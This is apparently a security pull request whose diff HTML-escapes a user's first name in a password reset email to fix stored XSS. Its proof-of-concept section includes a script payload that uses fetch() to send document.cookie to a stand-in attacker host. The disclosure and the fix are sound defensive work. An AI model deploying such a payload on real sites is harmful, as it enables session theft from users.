### PR TITLE
fix(security): escape user input in password reset email to prevent stored XSS

### DIFF
--- a/backend/core/auth_endpoints.py
+++ b/backend/core/auth_endpoints.py
@@ -383,8 +383,11 @@ async def forgot_password(
     config = get_config()
     reset_link = f"{config.server.app_url}/reset-password?token={token}"
     subject = "Password Reset Request"
-    body = f"Hello {user.first_name or 'User'},\n\nYou requested a password reset. Please use the link below to reset your password:\n\n{reset_link}\n\nThis link will expire in 1 hour."
-    html_body = f"<p>Hello {user.first_name or 'User'},</p><p>You requested a password reset. Please click the link below to reset your password:</p><p><a href='{reset_link}'>{reset_link}</a></p><p>This link will expire in 1 hour.</p>"
+    # Escape user-controlled input to prevent stored XSS (CWE-79)
+    import html as html_module
+    safe_first_name = html_module.escape(user.first_name or 'User')
+    body = f"Hello {safe_first_name},\n\nYou requested a password reset. Please use the link below to reset your password:\n\n{reset_link}\n\nThis link will expire in 1 hour."
+    html_body = f"<p>Hello {safe_first_name},</p><p>You requested a password reset. Please click the link below to reset your password:</p><p><a href='{reset_link}'>{reset_link}</a></p><p>This link will expire in 1 hour.</p>"
 
     logger.info("Password reset link generated for user %s", user.id)
     


### PR DESCRIPTION
## Security Fix: Stored XSS in Password Reset Email

### Summary
The password reset HTML email body was constructed using f-strings with `user.first_name` injected directly into HTML without escaping (CWE-79). Since `first_name` is user-controlled (set during registration), an attacker can inject malicious HTML/script content.

### Changes
- Added `html.escape()` to sanitize `user.first_name` before injecting into HTML email body
- Applied to both plain text and HTML email body

### PoC (before fix)
1. Register with `first_name = "><script>fetch('https://attacker.com/steal?c='+document.cookie)</script>`
2. Trigger password reset
3. Malicious script executes in webmail client

### Impact
Stored XSS in password reset emails. Webmail clients (Gmail web, Outlook web) may execute the injected script, leading to session theft or phishing.

Signed-off-by: FailSafe Security <security@failsafesecurity.ai>